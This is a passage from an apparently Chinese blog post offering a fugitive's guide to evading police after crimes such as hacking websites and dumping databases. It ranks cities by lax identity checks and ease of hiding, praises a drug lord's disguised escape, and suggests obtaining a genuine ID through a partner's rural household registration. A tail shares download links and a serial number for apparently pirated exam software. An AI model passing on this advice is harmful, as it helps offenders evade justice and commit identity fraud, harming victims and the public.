23. 好些类似网文写到一些偏僻的海岛、城市边缘山区的农家乐是好去处，不需要身份证，一天20元的住宿费，安全卫生。这是没有经验的臆想，跑路在外，百密一疏，一旦你疏忽了某个细节，在这里你只有被瓮中捉鳖，因为交通不便。以前那个大毒枭刘招华，警察和便衣已经堵在小区了，他粘上胡子坐电梯下楼，骑上自行车在警察面前镇定而过，等警方察觉，人已经逃脱。越是大城市你的逃跑机会和方式越多，比如公交、地铁、轻轨，中巴、出租车，摩的、非法营运黑车、大超市班车，工厂班车，看楼盘的车，机场大巴候车点；想出城的话，和谐号，城际特快，普通列车，汽车，轮渡，黑车，每一种都可能在危急时救你一命。
 
    24. 本人心目中最佳跑路目的地排名：
1.广州：老牌大都市，包容性强，外来流动人口巨大，交通高度发达，各色人等齐聚，骗子多，打工机会多，小本创业的机会多，身份查验不严，治安较差，消费水准丰俭由人，适合全国人民，生存底限1000/月。
2.东莞：世界工厂，流水操作工需求大，色情业发达，身份查验不严，治安极差；优点是工作好找，运气好下车就有招普工的，入行门槛低，当天上班，手续简便，适合落魄的兄弟迅速站稳脚跟。生存底限1000+/月。
  3.深圳：90%全是外来人口，没有所谓的本地人，优点是没有方言、地方风俗障碍，便于迅速隐匿；缺点：城市节奏快，生活成本接近上海，竞争激烈，治安一般，好于东莞，远低于长三角，就业机会不多，适合四十岁以下人士跑路。生存底限1500+/月。
  4.南京：科教文卫事业发达，生活节奏偏慢，物价水平低，北方外来人口多，适合东北，湖广的兄弟，方言接近普通话，沟通不困难，治安状况中等偏上，少有恶性刑事案，身份查验中等严格。治安防范意识远低于广东，易于隐匿。缺点：就业机会少，平均收入低，生存底限1200+/月。
  5.成都：人口多，城区大，慢节拍，低消费，典型居住型城市，就业机会中等多，治安一般，身份查验不严，骗子数量远低于广东，适合沪宁杭人士隐匿。缺点：川籍外来人口居多，外省较少，不便于迅速隐匿。生存底限1000-/月。如果能泡个来成都打工的乡下川妹子，可以把户籍落到她那边，很有可能轻易办到一张偏远地区农村户口和身份证。有了真的身份证你就可以大胆出入全国各地，但是现在还不能回老家，切记。
 6. 武汉，哈尔滨，天津+唐山，西安，排名不分先后，选择标准越远越好，最好跟你的旧生活圈子完全不相干。不推荐城市：北京，上海，杭州，郑州，长沙，沈阳，原因嘛，长年在外的老江湖心里都有体会。千万不要动辄就是大西北，大兴安岭，云贵山区之类的地方，那是没有头脑的凭空想象。记住，首选千万人口以上的大城市，而且要流动人口多，这样你才会隐蔽并且有打工的机会，保证自身可持续发展。
7. 有朋友问，我黑站刷库，无奈跑路，灯红酒绿的大城市跑遍啦，怎么办？不要慌，推荐以下二三线城市：四川：广安，泸州，达州。河南：开封，洛阳。贵州：凯里。浙江：衢州，绍兴，金华。山东：烟台，泰安，日照。江苏：扬州，南通，徐州。河北保定，东北：牡丹江，通化：广东惠州，广西柳州，就算你是当朝一品，封疆大吏，超级富豪，相信你的人脉还不足以覆盖这些地方。不推荐两湖及江西全境。选择标准：有一定旅游景点和特色产业作支撑，有外来人口淘金群体，很少有大案要案发生，治安防范意识差的城市。体貌特征，生活、和消费习惯，书写笔迹有没有办法应对？可以这么说，有矛就有盾，既然是终结版，当然有对策。但是在这个层面上，你自己要有一定的侦查与反侦查能力，了解痕迹学与追踪，审讯应对策略，应对突发事件的处理能力。
[caption id="attachment_2321" align="alignnone" width="1365"] 黑阔跑路普及
[/caption]

[caption id="attachment_2317" align="alignnone" width="796"] 二级C语言，二级office，二级VB题库，报了二级的赶快来[/caption][caption id="attachment_2318" align="alignnone" width="794"] 二级C语言，二级office，二级VB题库，报了二级的赶快来[/caption][caption id="attachment_2319" align="alignnone" width="762"] 二级C语言，二级office，二级VB题库，报了二级的赶快来[/caption]

二级C:

百度网盘：链接: https://pan.baidu.com/s/1i5p2c5n 密码: d84d
免注册码，软件内还有教学视频。下载后，直接把文件覆盖至安装目录即可。

二级office：正常安装至结束，打开软件，点击激活，输入序列号： 929682162，即可成功激活此软件。
百度网盘：链接: http://pan.baidu.com/s/1kVlgBT9 密码：ho9h

二级VB：免注册码
百度网盘：链接:http://pan.baidu.com/s/1qYkq2bq 密码：0h44